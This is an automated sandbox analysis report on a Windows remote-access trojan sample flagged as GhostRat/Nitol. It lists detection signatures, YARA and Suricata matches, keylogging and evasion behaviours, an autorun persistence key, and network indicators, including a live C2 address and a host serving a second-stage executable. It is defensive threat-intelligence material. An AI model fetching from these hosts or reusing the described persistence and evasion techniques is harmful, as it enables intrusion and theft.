Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
Analysis ID:1537400
MD5:b36366f4a27987d6de47887b03f29c68
SHA1:6f290bd6c132ec5c824558a29bdf75d25ced94e3
SHA256:4cc1ab70e6fd0d4441c778d40212c6e3114e14d56da85717214f8498e1c1501b
Tags:exeNitol
Infos:

Detection

GhostRat, Nitol, Young Lotus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
Yara detected Nitol
Yara detected Young Lotus
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if browser processes are running
Contains functionality to capture and log keystrokes
Hides threads from debuggers
Machine Learning detection for sample
PE file has a writeable .text section
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries device information via Setup API
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

Threatname: GhostRat

{"C2 url": "110.40.45.163"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
      00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Gh0st_ee6de6bcIdentifies a variant of Gh0st Ratunknown
      • 0xbb2:$a1: :]%d-%d-%d %d:%d:%d
      • 0x970:$a2: [Pause Break]
      • 0x1a54:$a3: f-secure.exe
      • 0x13e:$a4: Accept-Language: zh-cn
      00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_NitolYara detected NitolJoe Security
          Click to see the 34 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
            4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
              4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpackJoeSecurity_YoungLotusYara detected Young LotusJoe Security
                4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpackWindows_Trojan_Gh0st_ee6de6bcIdentifies a variant of Gh0st Ratunknown
                • 0x12bb2:$a1: :]%d-%d-%d %d:%d:%d
                • 0x12970:$a2: [Pause Break]
                • 0x13a54:$a3: f-secure.exe
                • 0x1213e:$a4: Accept-Language: zh-cn
                4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpackBackdoor_Nitol_Jun17Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre DownloaderFlorian Roth
                • 0x1229b:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
                • 0x12338:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
                • 0x1221c:$s1: \Program Files\Internet Explorer\iexplore.exe
                • 0x1213e:$s5: Accept-Language: zh-cn
                Click to see the 58 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, ProcessId: 1476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dhttdfv.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-18T22:25:41.952742+020028437291A Network Trojan was detected192.168.2.549796110.40.45.16370TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeAvira: detected
                Found malware configuration
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpackMalware Configuration Extractor: GhostRat {"C2 url": "110.40.45.163"}
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeJoe Sandbox ML: detected
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Binary string: iphlpapi.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2160765089.0000000002264000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
                Source: Binary string: wuser32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \Server\Release\Xy.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: wkernelbase.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wuser32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: z:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: x:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: v:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: t:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: r:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: p:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: n:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: l:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: j:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: h:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: f:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: b:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: y:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: w:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: u:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: s:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: q:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: o:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: m:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: k:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: i:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: g:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: e:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: c:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile opened: [:Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,0_2_00409457
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,0_2_1000140B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_00409457 SHGetSpecialFolderPathA,FindFirstFileA,_mbscat,strlen,memcpy,strlen,4_2_00409457
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_1000140B SHGetSpecialFolderPathA,strcpy,strcat,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcat,strlen,memcpy,strlen,4_2_1000140B

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2843729 - Severity 1 - ETPRO MALWARE Win32/Fsysna.hlwd CnC Checkin : 192.168.2.5:49796 -> 110.40.45.163:70
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 110.40.45.163
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0041200B URLDownloadToFileA,ShellExecuteA,0_2_0041200B
                Source: global trafficTCP traffic: 192.168.2.5:49796 -> 110.40.45.163:70
                Source: Joe Sandbox ViewIP Address: 106.52.15.123 106.52.15.123
                Source: Joe Sandbox ViewASN Name: YLWLBeijingYunlinNetworkTechnologyCoLtdCN YLWLBeijingYunlinNetworkTechnologyCoLtdCN
                Source: global trafficHTTP traffic detected: GET /system.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 106.52.15.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /system.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 106.52.15.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /system.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 106.52.15.123Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: unknownTCP traffic detected without corresponding DNS query: 106.52.15.123
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0041200B URLDownloadToFileA,ShellExecuteA,0_2_0041200B
                Source: global trafficHTTP traffic detected: GET /system.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 106.52.15.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /system.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 106.52.15.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /system.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 106.52.15.123Connection: Keep-Alive
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/H
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://106.52.15.123/system.exe
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exe.
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exe?
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://106.52.15.123/system.exeC:
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exeON%L
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exeW-
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exea
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exed
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exeuNoL
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exex
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/system.exez
